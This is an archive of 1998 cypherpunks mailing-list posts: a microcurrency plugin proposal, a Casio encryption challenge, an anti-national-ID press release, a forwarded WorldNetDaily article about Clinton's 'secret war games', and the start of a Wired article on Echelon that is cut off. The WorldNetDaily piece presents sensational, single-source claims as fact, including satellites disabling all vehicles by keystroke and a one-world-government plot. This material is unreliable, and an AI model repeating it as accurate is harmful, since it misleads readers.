From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 1 Oct 1998 18:20:04 +0800
To: cypherpunks@cyberpass.net
Subject: microcurrency proposal
Message-ID: <199810012320.QAA27969@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




recently James Donald wrote some well-thought-out/reasoned comments
on digital currency and microcurrency.

I've been talking about microcurrency for many years on this
list, and am quite chagrined lately at how long it is taking
to actually materialize. I would have thought it would be
available, for web pages especially, by now.

the new scaled-back goals of Digicash are disappointing, but
a good reality check.

musing over all this is leading me in the following direction.

a few months ago or so I posted info about a company that
was doing a plugin for netscape that allowed some small currency
transactions. I don't know what happened to this company--
does anyone remember who it was, or their web site?

but I think this is a very promising approach. a company
can create a plugin that would support microcurrency charges
for web page hits very easily. 

here's how: the plugin interacts with any site that has
enabled it. it sends a code to the site using a protocol.
the site returns pages only upon a valid transaction request.
for regular browsers without the plugin, the message is,
"sorry, this page costs $.01, please download so-and-so
plugin".

people are very willing to download plugins to look at pages.
people download plugins just to look at animation boxes.
surely they will be willing to download them to serve up
entire pages/content.

how would the cash charge work? when the person gets the 
plugin, they give the plugin company their credit card
number. the company takes care of the problem of accruing
micro charges, keeping track of transactions/bills, and 
billing the credit card in large amounts.

contesting a charge would tend to happen very rarely (because
of the small charges, it is barely worth the effort), but
the system could still support this.

the problem is trying to transfer money to various individuals
if their microcharge accounts have a net positive value instead
of negative (in which case they would be charged their credit
card at the end of the month). how do you transfer this money?

one possibility is sending a check at the end of every month,
or quarter, somewhat similar to the Amazon associates program.

another possibility is figuring a way to credit a credit card
account. this can be done, but from what I understand it is
"frowned upon" by the companies. I have always wondered if
the "powers that be" have intentionally tried to enforce this
so that credit cards cannot turn into a cash transfer mechanism.

of course, I'm leaving the issue of taxes out of this, but
the microcharge company could be a point of collection for
them.

notice that none of what I am proposing above requires any
new infrastructure whatsoever, except a little programming
into a plugin. the distribution of the plugin is partly solved
in that plugins are already distributed all over the net
and understood by end-users.

such a plugin could rapidly become the standard for
"microcurrency" and be a wedge that might be the creation
of a whole new industry within an industry. i.e.
microcurrency on the web, very much the way Netscape virtually
singlehandedly created the entire industry of the web within the 
existing internet.

the door is wide open. such a company could be a very lucrative
endeavor if handled very delicately and carefully, navigating
the minefield of glitches that are surely to be present (many
of which have prevented it from happening to date)

as I understand, the digicash software was not in fact
in plugin form for a browser. this is a pretty serious
handicap imho. the technique of turning it all into a 
browser plugin based on the existing credit card system
seems to me to be the crucial element that could make
it happen.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 1 Oct 1998 15:40:12 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Rain in Death Valley
In-Reply-To: <199810011932.OAA20010@einstein.ssz.com>
Message-ID: <v04011749b23998309620@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:37 PM -0400 on 10/1/98, X wrote:


> If the area you refer to is below sea-level, where would the hard-rains
> runoff run off to?

True enough. The water runs off the mountains *into* most of Death Valley,
not *out* of it.

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 1 Oct 1998 18:51:19 +0800
To: cypherpunks@cyberpass.net
Subject: Casio Computer offers 1,000,000 Yen encryption challenge
Message-ID: <199810012350.QAA00525@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: William Knowles <erehwon@kizmiaz.dis.org>
Subject: Casio Computer offers 1,000,000 Yen encryption challenge
Date: Sat, 26 Sep 1998 15:35:45 -0700 (PDT)
To: cryptography@c2.net

TOKYO, Sept. 25 /PRNewswire/ -- CASIO COMPUTER CO., LTD. announces 
development of the MDSR (Multi-Dimensional Space Rotation) encryption 
system for Internet and Intranet data.

MDSR is a new encryption system designed to meet the need for 
high-level digital data security, which has been generated with 
the growth of the Internet and Intranets.

The encryption system used by MDSR is based on Multi-Dimensional 
Space Rotation (MDSR) and Time-Dependent Multi-Dimensional Space 
Rotation (MDSR-TD). The main features of this encryption system 
are: the larger the space dimension the more difficult it is to 
break the code, no special hardware requirements for encryption 
or decryption, and the ability to narrowly regulate hierarchy 
and decryption privileges. The result is an encryption system 
that provides versatile private data management, confidential 
mail security, and security for data sent to multiple 
destinations. Since MDSR also enhances security for data on 
an Internet server, it is also suitable for use by system
administrators and Internet Service Providers.
 
The contest that is detailed on the CASIO Home Page starts 
from September 24, with a cash prize for the person who 
successfully breaks a message encoded with MDSR. CASIO plans 
to use MDSR in future CASIO data communication products.

Contest Details
 
Term:           September 26, 1998 to November 26, 1998 (JST)
 
Encrypted Text: Visit the CASIO Website for details.
                http://www.casio.co.jp/en/


[WK Note: 1,000,000 Yen is worth $7344.84 U.S.D.]


==
I regret to say that we of the FBI are powerless to act in 
cases of oral-genital intimacy, unless it has in some way 
obstructed interstate commerce. -- J. Edgar Hoover
==
http://www.dis.org/erehwon/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 1 Oct 1998 18:50:00 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Clear and present danger: FIGHT AGAINST NATIONAL ID CARD
Message-ID: <199810012350.QAA00536@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "A.C." <angie@computerhut.net>
Subject: IP: Clear and present danger: FIGHT AGAINST NATIONAL ID CARD
Date: Thu, 01 Oct 1998 01:22:50 -0700
To: ignition-point@majordomo.pobox.com

>>http://www.house.gov/barr/p_doj.html
>>
>>
>September 17, 1998  

                      BARR TAKES FIGHT AGAINST NATIONAL ID CARD TO
                             HEARINGS, SPEARHEADS EFFORT WITH
                                     GRASSROOTS GROUPS

                    WASHINGTON, DC -- At a news conference before a hearing on
                    federal attempts to establish a national identification
system, U.S.
                    Representative Bob Barr (GA-7) released the following
statement.  The
                    hearings, which will be held later today by the
Government Reform and
                    Oversight Committee's Subcommittee on National Economic
Growth,
                    Natural Resources, and Regulatory Affairs, will focus
on this issue. 

                    "One of the most precious liberties Americans possess
is the ability to live
                    their lives without a big-brother government, with vast
power, looking
                    over their shoulders at every opportunity.  Our federal
government is
                    already too powerful, too expensive, and too intrusive.
 We should be
                    working to reduce its size and cost, rather than
expanding it. 

                    "Our Founding Fathers intended to create a system with
division of
                    power between three branches of government and between
the state and
                    federal governments in order to protect our rights.
These moves to
                    centralize power in the executive branch of the federal
government by
                    establishing a national identification card system
represent an effort to
                    disrupt the balance of power that has served our nation
so well for so
                    long.  We must put a stop to these initiatives, begun
in 1996 when
                    legislation authorizing a national i.d. was snuck into
an omnibus spending
                    bill with no debate, public input, or vote,  before it
is too late to do so." 

                    "I thank all of the groups that have been involved in
this effort for their
                    continued support.  I also appreciate the willingness
of State
                    Representative George Grindley (R-Marietta) and others
to take time
                    away from their jobs and families to testify this
morning. 

                    These hearings are part of a continuing effort by Barr
and others to stop
                    several recent intrusive government proposals.  He has
introduced
                    legislation to stop federally-mandated standardization
of state drivers'
                    licenses, end a move to create a national health
identifier, and led the
                    effort to halt FBI moves for new wiretapping authority
and the ability to
                    track cellular phone users and lawful gun owners. 

                    Barr, a former United States Attorney, serves on the
House Judiciary
                    and Government Reform Committees. 

                                             --30--  

                                  BACK TO PRESS RELEASES
                                BACK TO MEDIA INFORMATION
                                     BACK TO MAIN PAGE


>





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 1 Oct 1998 18:50:02 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [Part 1 & 2] THE IMPERIAL PRESIDENCY By David M. Bresnahan
Message-ID: <199810012350.QAA00551@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Kepi <kepi@netdoor.com>
Subject: IP: [Part 1 & 2] THE IMPERIAL PRESIDENCY By David M. Bresnahan
Date: Wed, 30 Sep 1998 23:37:09 -0500
To: ignition-point@majordomo.pobox.com

For those who may have missed this report; all others, please disregard.
Kepi <><

...........<Begin Forwarded Message>...........

>X-Sender: cabhop@mail.highfiber.com
>X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32)
>Date: Wed, 30 Sep 1998 11:57:22 -0600
>To: (Recipient list suppressed)
>From: Robert Huddleston <cabhop@highfiber.com>
>Subject: THE IMPERIAL PRESIDENCY [ Part 1 & 2 ] By David M. Bresnahan 
>
>
>http://www.worldnetdaily.com/exclusiv/980929.exbre_clintons_secr.html
>http://www.worldnetdaily.com/exclusiv/980930_exbre_clintons_secr.html
>
>SEPTEMBER 29 & 30, 1998                  
>
>
>THE IMPERIAL PRESIDENCY 
>Clinton's secret war games 
>He's scheming for strike to make him international hero 
>                  
>
>This is the first of a two-part series on the
>revelations of military computer expert Curt Tomlin. 
>
>By David M. Bresnahan 
>Copyright 1998, WorldNetDaily.com 
>
>President Bill Clinton is playing war games
>on a top secret computer to come up with a
>way to be an international hero, according to
>the man who designed the system. 
>
>According to Rev. Curt Tomlin, a former
>member of the battle staff of both presidents
>John F. Kennedy and Lyndon B. Johnson,
>Clinton is a desperate man who is like an
>animal trapped in a corner. He will do
>anything to regain his credibility and deflect
>criticism from his impending impeachment
>hearings, he says. He also is driven by his
>desire to create a positive legacy of his time in
>the White House, according to various
>reports. 
>
>Clinton's motivations are dangerous to the
>security of our nation, according to Tomlin. It
>was Tomlin who designed and perfected the
>Pentagon's first war games computer system,
>the top secret "Single Integrated Operating Procedure." 
>
>The "SIOP" computer is a method of targeting
>a military attack and evaluating the most
>likely response to that attack, according to
>Tomlin. Highly classified intelligence
>information is gathered from all over the
>world by the CIA and other sources, placed in
>the computer, and then accessed by Clinton to
>play his own personal war games. 
>
>"The decisions he's making right now are
>totally illogical and irresponsible," Tomlin
>told WorldNetDaily in an exclusive interview.
>"Looking at the power and everything he's got
>at his finger tips. That's a dangerous situation
>for a spastic individual." 
>
>Tomlin has maintained silence about the top
>secret program for many years. He has been
>called out of retirement three times and has
>served in the Navy, Air Force, and Army for a
>combined total of just over 24 years. He has
>also been hired by government contractors to
>assist in computer intelligence systems
>designed to improve security for military
>computer systems. 
>
>"I could be sticking my neck on the chopping
>block for a number of reasons," said Tomlin of
>his decision to make his information public.
>"Number one is, I'm still under some lifetime
>restrictions on security clearances. For
>example two of the clearances I had above top
>secret was ESI and category 7 and 9. That was
>three above that. Those are lifetime. So I have
>to be a little bit careful about what I put in
>print. I think people have to be aware of this,
>regardless of the consequences on my end. I
>feel that I would be guilty of the military
>crime of negligence of duty if I did not bring
>this to somebody's attention," explained
>Tomlin. 
>
>Clinton had tried to become an international
>hero by destroying hundreds of terrorists
>being trained by Osama bin Laden in
>Afghanistan and a chemical weapons plant in
>Sudan. Those two missile attacks were chosen
>through use of the SIOP computer to which
>Clinton has access, according to Tomlin. 
>
>The computer predicted the result of the
>attacks would bring about the death of
>hundreds of terrorist forces and eliminate a
>chemical weapons factory. Someone
>intervened to change the results, according to
>an intelligence source who spoke only on
>condition of anonymity. 
>
>Reports in European newspapers after the
>attacks by Clinton corroborate what that
>source claimed. "There were no dead
>terrorists, and the chemical weapons plant
>was an innocent pharmaceutical plant. Instead
>of being a hero, Clinton is an international
>laughing stock. The terrorists were tipped off
>and cleared the area. The real chemical
>weapons plant was two miles away. It was a
>combination of bad intelligence and
>purposeful intervention," said the source. 
>
>Clinton has been searching the SIOP system
>ever since the failure in an effort to find
>another opportunity to prove himself to the
>world and become the international hero he
>envisions for his legacy, according to the
>source. Tomlin agrees. 
>
>"There's no choice. He's either going to sink or
>try again. We can look for some very
>unpleasant responses, depending on the
>target he chooses," says Tomlin. 
>
>When Clinton actually succeeds at inflicting
>damage to a group of international terrorists,
>many experts believe there will be swift and
>deadly retaliation. Americans are in danger of
>massive chemical and biological attacks in
>major metropolitan areas, as well as similar
>attacks on large military bases. 
>Tomlin says he is personally aware of
>unprotected water supplies to domestic
>military bases that could provide terrorists an
>opportunity to poison the drinking water
>used by most of the nation's military. 
>"When you contaminate a water supply ...
>that's almost beyond my comprehension," he
>remarked. The open borders of the United
>States make it a simple process for terrorists
>to come into the country and bring their
>weapons of mass destruction with them
>without detection," he says. "They can come
>and go as they please with any kind of cargo.
>That border is literally wide open, regardless
>of what INS tells you," warned Tomlin. 
>
>Tomlin believes there are many terrorist
>agents already located in the United States
>waiting for orders to strike. Other sources
>have independently confirmed that claim but
>were unwilling to be identified. 
>
>"There's no doubt that the U.S. is currently in
>the greatest danger of massive domestic
>attack from an external enemy than ever
>before in our nation's history," agreed one
>intelligence source who is equally concerned
>about Clinton pushing such terrorists to the
>point to massive retaliation. "They just need
>an excuse," he said. 
>
>"Of course, the president has available to him
>an awesome military force that he can use to
>launch a first strike on any target in the
>world," explained Tomlin of the top secret
>system available to Clinton. "One of the things
>I have been real concerned about recently is
>the type of response that we can expect from
>these various targets that the president can
>choose from. For example, if he chose to hit
>target A, the computer system would come
>back and tell him what kind of response he
>can expect. Will that response be in the nature
>of an explosive response like blowing up an
>embassy? Will it be in the form of a chemical
>or biological response, or a combination of the
>two? And it will also tell him, will the
>response be a psychological or political
>response, or a combination of any of these? In
>other words, the system will come back and
>tell him exactly what he can expect the owners
>of that target to do in retaliation," explained
>Tomlin, the father of that real-life computer
>war game. 
>
>"We got an awful lot of our information
>through CIA on site sources where these
>various targets were located," Tomlin says.
>"We could tell you anything you wanted to
>know about that target. How thick the walls
>were, if it were a structure, how far under
>ground it goes. How many megatons of
>explosives it would take to wipe it out totally,
>or give you 50 percent destruction, or 75
>percent destruction. We could just tell you
>anything you wanted to know about that
>target." 
>The highly advanced computer system as
>well as the automated launch and attack
>systems enable Clinton to initiate an attack
>without the knowledge of very many other
>individuals. Such decisions could be made by
>Clinton alone, or with just a few political
>advisers. Military and security advisers could
>be left in the dark. 
>
>"That's what bothers me today," says Tomlin.
>"Given the fact that the man in the White
>House now has his finger on the trigger, and
>he can launch those forces which still consist
>of atomic warheads on any intercontinental
>ballistic missile. He can create a situation that
>could be very detrimental to this country.
>There are certain things that I'm really
>concerned about at this point in time
>concerning the highly probable responses that
>the president can expect as the result of
>striking certain targets." 
>
>With SIOP, Clinton can sit at his private
>computer and play war games until he finds
>the situation he likes best. He can literally
>type in various attacks around the world and
>the SIOP computer will tell him what will be
>the likely results of such an attack. With the
>push of a button he can turn the computer
>simulation he likes best into reality. 
>
>"The ones I am concerned about now is the
>possibility of a chemical or biological
>response to a specific strike that he would
>initiate," said Tomlin of his fear. "Simply
>because an explosive response is limited in
>scope. It's a token. It's a warning. But when
>you drop a very small amount of biological or
>chemical agents into the water supply of a
>large city of Dallas or Houston, my friend, we
>have a problem in that area. You can bring
>these agents through customs on our southern
>border almost undetected. There's just very
>little possibility of these things being detected
>coming through Customs or just walking
>across the border in a deserted area." 
>
>Tomlin created the SIOP computer back in
>1963 when he served on the Kennedy battle
>staff. He continued to serve on the Johnson
>battle staff as well. Since then he has helped
>the military work on numerous top secret
>defense projects and information systems. 
>
>Tomlin did his work in the top secret
>underground "site R," as well as in the
>Pentagon war room. His work was considered
>so critical that he had a 24-hour armed Marine
>guard watching over him. 
>
>Although Tomlin is now retired, he still lives
>by Fort Hood in Texas and has many
>neighbors who are current and former
>military. He claims there are many who are
>getting out of the service because of Clinton. 
>
>"Unfortunately," says Tomlin, "that's the
>sentiment that is running rampant among
>military people in this area. If you cannot
>trust your leader, then we have a problem.
>This man cannot be trusted. They are
>deserting (their careers). I'm talking about our
>combat experienced veterans. They're giving
>up 18 years, 17 years and so forth and getting
>out because they can no longer trust their
>leader. They don't want to be a part of what he
>might create." 
>Tomlin expects Clinton to launch an attack
>very soon that will bring devastating
>domestic retaliation to the U.S. 
>"If I were still on active duty, either as an
>enlisted man or as a commissioned officer,
>knowing what I know now, looking at all of
>the information I have available to me, I
>would have no choice but to resign my
>commission or terminate my enlistment
>simply because there is no way that I could
>now trust my commander in chief," said Tomlin. 
>
>THE IMPERIAL PRESIDENCY 
>Clinton's secret war games -- part 2 
>He has the power to disable electronics
>anywhere in the world 
>                  
>This is the second of a two-part series on Clinton's secret
>war games and the concerns of the man who helped invent
>them. 
>
>By David M. Bresnahan 
>Copyright 1998, WorldNetDaily.com 
>We are living in a new age of electronic warfare
>which could make every electrical device from
>military tanks to clock radios inoperative, according
>to one of the people responsible for such weapons
>systems. 
>
>President Bill Clinton could enter a few key strokes
>on a computer and selectively disable all electronics
>anywhere in the world, including within the U.S.,
>using a top secret satellite system known as "LEO."
>That ability is not unique to the U.S., however. Other
>countries and even terrorists could knock out
>electronics equipment anywhere in the world. 
>
>Rev. Curt Tomlin, 65, is a retired Army major with 24
>years combined service in the Navy, Air Force, and
>Army. He was a member of the battle staff for the
>Kennedy and Johnson administrations and
>developed top secret computer systems for the
>Pentagon. His unique expertise prompted the
>military to bring him out of retirement three times to
>put his skills to use in the development of war
>games computers, security computer systems and
>the testing of electronics warfare. 
>Tomlin gave an exclusive interview to
>WorldNetDaily to express his concerns about
>national security. He says the U.S. is in grave danger
>because of a president who is desperate to hang on
>to his position of power at all cost. 
>
>In an exclusive WorldNetDaily article yesterday,
>Tomlin detailed his fears that Clinton is using a war
>games computer to find a new target he can attack.
>Clinton's goal, according to Tomlin, is to become an
>international hero. Tomlin, who created the nation's
>first computer war game system, known as "SIOP,"
>for the Pentagon, fears that Clinton's actions will
>bring devastating retaliation from terrorists who are
>just waiting for an excuse to activate their plan of
>domestic attack against the U.S. 
>
>Although Tomlin believes the greatest danger to the
>U.S. is from biological and chemical weapons, he is
>also concerned about electronic warfare. Tomlin
>believes Clinton is very upset with a large portion of
>the nation that wants him impeached. He says
>Clinton is planning a way to get back at his enemies
>in a big way. 
>
>"This man (Clinton) is extremely vindictive and he's
>going to get back at the country one way or another,"
>said Tomlin, who is also concerned about Clinton's
>recent attempt to use the SIOP computer to attack
>alleged terrorist sites in Afghanistan and Sudan.
>Tomlin believes new attacks are imminent in order
>to turn the previous failure to damage the terrorists
>into a major victory that will make Clinton an
>international hero. 
>
>Tomlin expects domestic retaliation from the next
>attack by Clinton to be devastating. He says terrorists
>are already in the U.S. awaiting orders to attack, a
>claim supported by a recently intercepted fax sent
>world wide to 5,000 "soldiers" loyal to Osama bin
>Laden. The faxed order, reported in London and
>Jerusalem newspapers recently, tells the terrorists to
>be prepared to attack U.S. and Israel in four ways
>very soon. 
>According to the fax, the attacks would be designed to 
>
>Bring commercial airlines to a halt 
>Stop all maritime traffic 
>Occupy U.S. embassies around the world 
>Shut down U.S. banking 
>
>Such actions would seem difficult to achieve, but
>Tomlin says it would actually be easy to accomplish
>with access to electronics warfare devices. Although
>his greatest concern is chemical or biological attack,
>he said he would not be surprised if the attack came
>through electronics. Virtually everything from
>military aircraft to TV remotes would be disabled,
>according to Tomlin. 
>Tomlin was called out of retirement in 1995 to
>participate in a top secret project. He worked in the
>10th Mountain Division as a senior test plan analyst. 
>
>"You know that your automobile has an electronic
>ignition in it," explained Tomlin. "It also has a
>computer inside that. Did you know that we can
>immobilize every moving vehicle in this country
>with a few key strokes of a computer, all at the same
>time? 
>
>"By using the LEO satellites," he described, "you can
>disrupt the computers. You can stop that electronic
>ignition. It's all electronically based. You can
>interfere with it and stop it dead in it's tracks." 
>
>Tomlin also worked on tests dealing with laser
>technology and the global positioning system, but he
>did not provide details of those tests or their
>purpose. He did say the testing was extensive and
>was all for military purposes. 
>It is clear that China and other countries have this
>same technology, agreed Tomlin. He believes the
>recent intercepted bin Laden fax is evidence that
>terrorists have this same ability. Electronic warfare
>would make all four of the stated goals easily attainable. 
>
>Tomlin is risking legal action by the Pentagon for
>revealing top secret information. That's a risk he says
>he is willing to take because of the danger he
>believes has been caused by an out-of-control president. 
>
>"The decisions he's making right now are totally
>illogical and irresponsible," said Tomlin about his
>concerns regarding Clinton. "Looking at the power
>and everything he's got at his finger tips. That's a
>dangerous situation for a spastic individual." Tomlin
>has maintained silence about the top secret program
>for many years, but now he feels compelled to speak
>out. 
>
>"I could be sticking my neck on the chopping block
>for a number of reasons," said Tomlin of his decision
>to make his information public. "Number one is I'm
>still under some lifetime restrictions on security
>clearances. For example two of the clearances I had
>above top secret was ESI and category 7 and 9. That
>was three above that. Those are lifetime. So I have to
>be a little bit careful about what I put in print. 
>"I think people have to be aware of this, regardless of
>the consequences on my end. I feel that I would be
>guilty of the military crime of negligence of duty if I
>did not bring this to somebody's attention,"
>explained Tomlin. 
>
>Is this all part of a planned conspiracy? Or is this a
>president gone mad? Tomlin said he would not be
>surprised by either scenario. 
>
>"If that's the way it turns out, I will not be at all
>surprised," he said. "When you put all of the pieces
>of the puzzle together you see how it all fits together.
>
>"The ultimate end product of these programs the
>government has been working on is to create a
>generation of people who will readily accept sudden
>and radical change without question, without
>objection, and without opposition. That's the goal of
>these programs in a nutshell. This is headed toward
>a one-world government without any question
>what-so-ever, he warns. These programs have been
>going on for a long time. People need to pay
>attention to what Outcome-Based Education is all
>about, what Goals 2000 is all about, and these other
>socialistic programs that are leading in this direction.
>It's upon us," warned Tomlin. 
>
>In recent years Tomlin has been teaching and writing
>college courses dealing with electronic data
>processing. He tells his students, "If you can think of
>it, you can do it. Your only limitation is your own
>imagination. There are no limitations when it comes
>to electronics. 
>
>"Y2K is going to be one of the biggest problems
>you've ever seen in your life, coupled with the other
>intentional (electronic) interferences we're talking
>about." 
>
>Tomlin says he entered a Navy competition back in
>1963 for a mystery computer assignment. After two
>weeks of competition with many others who wanted
>the top secret, undisclosed position, Tomlin was
>notified to pack his bags and report to the Pentagon. 
>"I had no idea what I would be doing until I walked
>into the front door. I had to compete for that job. At
>that time there were 700 of us in the Navy who had
>shown specific talent and progress for designing
>information and processing systems. That was Navy
>wide because data processing was so new at that
>time," explained Tomlin. 
>
>"There was three places we worked out of. Site R,
>which was the underground command post, the war
>room in the Pentagon -- the JCS war room. We also
>had a facility on the North Hampton, which was a
>light cruiser. That was also the Presidents alternate
>battle site on that cruiser. Later we also had a facility
>on the U.S. Wright, which was a converted jeep
>carrier from World War II." 
>
>When he first arrived he was the youngest, 30, and
>lowest ranked, petty officer, member of the Kennedy
>battle staff. No one on the team knew just what they
>wanted or expected from Tomlin, so he just observed
>and tried to find ways to put his skills to use. 
>
>"Nobody on the battle team was capable of telling
>me what they wanted me to do," he said. "So I
>iddled around there for a couple of weeks just
>watching what the rest of the battle staff did during
>their exercises and their presidential briefings and
>stuff like that. Kind of with my hands in my pockets.
>We had a worldwide battle exercise and I wandered
>around the war room and watched them post the
>status boards, the maps, and process the 'twixes' as
>we called them back then. That's all the messages
>and the strikes and the targets. Finally, I concluded
>that these guys were doing this the hard way." 
>Tomlin, accompanied by his armed Marine guard
>who was with him 24 hours a day, went to work in
>the seclusion of his underground war room at site R.
>He began putting together some very simple
>procedures using IBM punch cards on the latest and
>greatest computer 1963 technology had to offer.
>Within just a few weeks another war game was
>called and Tomlin was ready to show off his
>creation, which he created totally on his own. 
>
>"We had a war game, and while they were doing
>heir thing out there, nobody paid any attention to
>me and nobody knew I was around. So I went back
>and I got copies of all the incoming data and I did
>my thing and I threw my shoulders back one day
>and just started posting the status boards and
>everybody else -- all these lieutenant colonels and
>colonels and brigadier generals and everybody else
>-- were all gathered around the conference table and
>somebody said, 'Tomlin what the hell are you
>doing?' I said, 'Well, I'm plotting the results of these
>various strikes.' And they said, 'Who told you to do
>that?' I said, 'Nobody did.' 
>
>"They got to looking at their conclusions and my
>conclusions and they were identical. What took 30 or
>40 folks for them to do, well I did it by myself in just
>a matter of minutes," described Tomlin of his first
>war games computer program. So that got their
>attention, and that's where everything started. So the
>next time around they used my computerized war
>game, which was the first one the Department of
>Defense ever had. Then later I got tasked to build a
>system for the targets, and then the rate of
>production for atomic weapons storage and
>accountability, and all that good stuff. It just kind of
>exploded (military computer assignments) from
>there." 
>
>The military had never called retirees back into
>full-time active duty until they needed Tomlin
>during the Gulf War. They needed him and didn't
>have a policy in place that enabled them to bring him
>back, pay him, and give him credit towards his
>retirement benefits. 
>Tomlin is listed as a military resource with critical
>skills, so the government made the necessary
>changes in policy and got him back for a full year of
>service. During that time he worked in the national
>records center in St. Louis, MO, to install new
>computer systems and redesign internal security for
>6.9 million records. The commercial company he
>worked with to accomplish the task is owned by
>Ross Perot, he pointed out. 
>As the pioneer of computerized war games, and
>other information systems, Tomlin is obviously
>proud of his work. He is speaking out because he
>believes Clinton is a desperate man trying to save his
>position of power at any cost. He believes Clinton is
>not acting rationally and is about to subject the U.S.
>to grave danger from international terrorists. Tomlin
>says he is willing to accept the personal risk he is
>taking by revealing sensitive information about
>military systems and capabilities. 
>
>Tomlin, is now a minister, and is the director of the
>Christian Alert Network. He devotes his time to
>informing pastors and concerned Christians of
>problems he sees in government schools. He actively
>promotes home schooling, private schools and
>reform of public schools, which he says are being
>used by the government to manipulate the beliefs of
>children and take away parental rights. 
>
>"The primary purpose of the Christian Alert Network
>(TCAN)," states his web page, "is to inform
>individual Christian citizens on specific situations
>that adversely impact upon our basic Christian
>doctrine, religious freedom and traditional families
>and to encourage them to participate in the
>governmental process, in obedience to the Holy
>Scriptures and according to the intent of our
>Founding Fathers." 
>
>
>
>
>
> David Bresnahan, a WorldNetDaily contributing editor,
>hosts "Talk USA Investigative Reports" and is the author
>of "Cover Up: The Art and Science of Political Deception."
>   His email address is David@talkusa.com. 
>
>
>
>
>
> <@{{><   <@{{><   <@{{><   <@{{><   <@{{><   <@{{><   <@{{><
>
>SOCIALIST
> 1. socialism
>   ( Noun ]
>     : social organization based on goverment control of the
>production and distribution of goods.
>                                *****
>   "Gun registration is not enough."
>        Attorney General Janet Reno,
>        December 10,1993 (Associated Press) 
>
>    "Waiting periods are only a step.
>      Registration is only a step.
>   The prohibition of private firearms is the goal."
>                   - Janet Reno
>
>*************************************************
>"But if the watchman sees the sword coming and does not blow the trumpet to
>warn the people and the sword comes and takes the life of one of them, that
>man will be taken away because of his sin, but I will hold the watchman
>accountable for his blood."
>Ezekiel 33:6 (NIV)
>___________________________________________________________
>New toll-free hotline to Congress 
>Congress is making a new toll-free number available for
>citizens who would like to make their voices heard in
>Washington.      1-800-504-0031 
>Ask for your Congressman office and let him know
>what you think.............
>---------------------------------------------------------------
>Join Gun Owners of America [ GOA ] today.
>Read more about GOA at :     http://www.gunowners.org/
>--------------------------------------------------------------
>Jews for the Preservation of Firearms Ownership (JPFO)
>Become a JPFO member, go to: http://www.jpfo.org/member.htm
>There you will see a printable member application, along with
>info on membership Membership IS open to ALL Law
>abiding citizens.
>---------------------------------------------------------------
>
>
><@{{><   <@{{><   <@{{><   <@{{><   <@{{><   <@{{><   <@{{><
>
>
>
>
>
>





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 1 Oct 1998 18:51:30 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Europe's Echelon eavesdropping exposed
Message-ID: <199810012350.QAA00562@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Europe's Echelon eavesdropping exposed
Date: Thu, 01 Oct 1998 10:18:09 -0500
To: believer@telepath.com

Source:  Wired
http://www.wired.com/news/news/politics/story/15295.html

 Eavesdropping on Europe
 by Niall McKay 

 4:00 a.m.30.Sep.98.PDT
 If the European Parliament has its way, the lid is
 about to come off what is reputedly one of the
 most powerful, secretive, and extensive spy
 networks in history -- if, in fact, it really exists. 

 In October, Europe's governing body will
 commission a full report into the workings of
 Echelon, a global network of highly sensitive
 listening posts operated in part by America's
 most clandestine intelligence organization, the
 National Security Agency. 

 "Frankly, the only people who have any doubt
 about the existence of Echelon are in the United
 States," said Glyn Ford, a British member of the
 European Parliament and a director of Scientific
 and Technical Options Assessment, or STOA, a
 technology advisory committee to the
 parliament. 

 Echelon is reportedly able to intercept, record,
 and translate any electronic communication --
 telephone, data, cellular, fax, email, telex -- sent
 anywhere in the world. The parliamentary report
 will focus on concerns that the system has
 expanded and is now zeroed in on the secrets of
 European companies and elected officials. 

 The parliament is alarmed at reports of
 Echelon's impressive capabilities, and during a
 debate on 19 September, the European Union
 called for accountability. The parliament
 stressed that the NSA and the Government
 Communications Headquarters, which jointly
 operate Echelon, must adopt measures to guard
 against the system's abuse. 

 International cooperation on law enforcement is
 important, Ford said, but there are limits. "We
 want to establish a code of conduct for the
 systems to protect EU citizens and
 governments." 

 Across the Atlantic, Patrick Poole, deputy
 director for the Free Congress Foundation, a
 conservative Washington think tank, is preparing
 a report on Echelon to present to Republican
 members of Congress. "I believe it's time we
 start to bring this matter to our elected officials,"
 he said. 

 Poole and Ford have their work cut out for them:
 Neither Britain nor the United States will admit
 that Echelon even exists. The NSA declined any
 comment on a series of faxed questions for this
 story. 

 Keyword: Bomb 

 Over the years, enough information has leaked
 to suggest that the spy network is more than
 science fiction. Echelon came to the attention of
 the EU Parliament following a report
 commissioned by STOA last year. 

 "Unlike many of the electronic spy systems
 developed during the Cold War, Echelon is
 designed for primarily non-military targets:
 governments, organizations, and businesses in
 virtually every country," the report said. 

